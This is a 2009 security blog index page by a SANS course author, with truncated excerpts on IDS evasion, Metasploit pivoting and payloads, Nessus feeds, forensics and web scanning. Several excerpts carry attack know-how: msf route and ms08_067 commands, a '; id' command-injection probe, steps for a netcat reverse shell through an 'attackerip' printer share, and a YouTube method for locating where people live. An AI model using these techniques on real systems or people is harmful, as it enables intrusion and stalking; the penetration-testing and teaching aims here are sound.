Skip to main content


Showing posts from 2009

Welcome to Mark Baggett - In Depth Defense

I am the course Author of SANS SEC573 Automating Information Security with Python. Check back frequently for updated tools and articles related to course material.

TCP Fragment Evasion

Originally posted on

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments, that must be a mistake. The TCP Header doesn't have a 'more fragments bit', a 'fragment offset' or anything to support fragmentation. How can there be any TCP fragments?"   Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of layer3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".
So what is TCP or Layer 4 "fragmentation"? Really, its overl…

Posts moving to PaulDotCom

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Don't forget to wipe!

A while back I assisted the FBI in the collection of evidence of a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dial my contact with the FBI. (Good contacts are ESSENTIAL don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and pose she was in was very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the content…

Good enough Compliance??

Check out this article..

What is "Good enough Compliance?" You either ARE complaint or you ARE NOT. Its a switch. The article should be a guide to "Good enough security". Good security is no the same a being compliant. I would much rather have good security then being compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things caught came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach…

Interesting story on US Cyber attack

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."

Snort 3.0 SANS Paper

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at

No exploit Metasploit usage - VNC and Keylogging

OK.  I admit it.  I use metasploit at work.  Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well.    I often use the PSEXEC "exploit" to provide username and password to fully patched machines for administrative purposes.   For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access.   They, rightly so,  have figured out that if the security team can get in to their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords.   One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host.  I use to connect to the remote c$ with administrator credentials, copy up vnc, import the required registry keys, start the server, fix the problem, clean up the regi…

Metasploit adds new keylogger and Mac payloads

Metasploit added some pretty interesting payloads to its arsenal this week.   First, Meterpreter (the only payload you'll ever need) added a keylogger.  Plus, they have added some cool payloads for the Mac.   There are a set of isight payloads that will snap a picture from the isight camera (bind_tcp, reverse_tcp, etc).   This payload is an part of the "bundle inject" payload which are documented in the Mac OS X hackers handbook  this looks like it could be the beginning of a meterpreter like plug-able payload for OSX.    Charles Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests is coauthor of the payloads along with Dina Dia Zovi.   That is definitely a book I will be adding to my library.   Here is a recent presentation with some interesting information on the payloads.

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

I'm going to mentor another SANS 504 session this fall.  Hacking Techniques, Exploits and Incident response is one of my favorite SANS classes.   This is my third mentor session and my second time running 504.   Last year SANS gave me the Mentor of the year award so they are giving me some additional flexibility in the mentor format.    This time we are running a modified mentor format.  We will have 13 more hours of class time than the normal mentor session.   That's more time for covering the materials and doing exercises.  If your interested get full details and sign up here.   Greater Augusta ISSA members contact me for a very special discount code.

Using the free Nessus feed on your Mac

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use. has a free nessus feed you can subscribe to.  It is available for use here.   You will notice two update programs there.  One for Unix and one for Windows.   What about the MAC?   To subscribe the nessus feeds on your macintosh do this:
1) Download the linux update script. 2) Update it so it works on your MAC as described below.
First, in the "#Plugin dir" section you will need to to change the line that reads:
NVT_DIR="/var/lib/nessus/plugins/" to  NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"

3) chmod +x
If you run the script by typing :
./  nessus 
you will see an error about not being able to find the command "md5sum".   The nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully.   That might be good enough for you and you c…

Reverse Pivots with Metasploit - How NOT to make the lightbulb

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your word document with an embeeded Meterpreter payload. The stager embedded in the word document made a REVERSE_TCP connection to your machine which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2 however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2 you could have used the ROUTE command to pivot your attack through your meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP = Victim1 = Victim2 =
Background session 1? [y/N] y msf exploit(ms08_067_netapi) > route add 1 msf exploit(ms08_067…

I know where you live... or at least google does

Can you use to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTubes “Advanced Search”.

Click “Advanced Options” and “Show Map”. Type in the userid of the person your trying to location and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not you will see “No Videos found for xyz” and a playlist for the user you are searching for. The difference between a hit/no hit is subtle. Do a search for something you know is geoencoded so you can see the differenece. As a rule, if you see this then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smal…

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but its worth repeating; No scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly.   I like to think of it as a web app fuzzer on steroids.  Here is a custom signature I've added to help me cover my bases.
When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the field on a page. If it doesn't see "uid=0(root) " (or preferrably the uid for an a less priveleged apache httpd user) returned from the web server somewhere in that response then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:
A website has a…

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.
Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat.  It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back April 08.   Using that technique I was able to shovel command output to netcat running on an arbitrary port.  But I really want a bidirectional interactive shell.   The thought is this.   
1) Share a netcat listener on my linux box over SMB.    2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled 3) Net use lpt1 \\attackerip\netcatshare 4) lpt1 (The 16 bit p…

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies.…

Door Schedule Fail

Huh?  I see this sign frequently.  So I went ahead and figured it out.  The diagram below reveals the door schedule.  I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm  etc..  So I guess they only unlock the stair wells on weekends when no one is in the office.  Must be a security measure.  :)
Sat, SunMonTues-ThursFridayHolidays00:00am-04:00am11,2,51,21,2,41,64:01-9:29pmOPEN2,52269:30pm1,31,2,3,51,2,31,2,31,3,69:31pm-11:59 pm11,2,51,21,21,6

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assersion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office Documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group policy to set your Office Document Macro Security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

Who would you trust?

There is no shortage of stories about infected digital picture frames out there.  The SANS Internet Storm Center has had several posts on the subject.   When Santa brought my daughter a Sakar "Portable Digital Picture Frame"  I was sure to scan it with some antivirus software.   Sure enough, McAfee reports a Trojan exists in on the device.   I checked the Manufacturers  support page and found this note on the Product FAQ..
"Does my product have a virus?No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."
Other antivirus products are not affected.  It must just be a McAfee …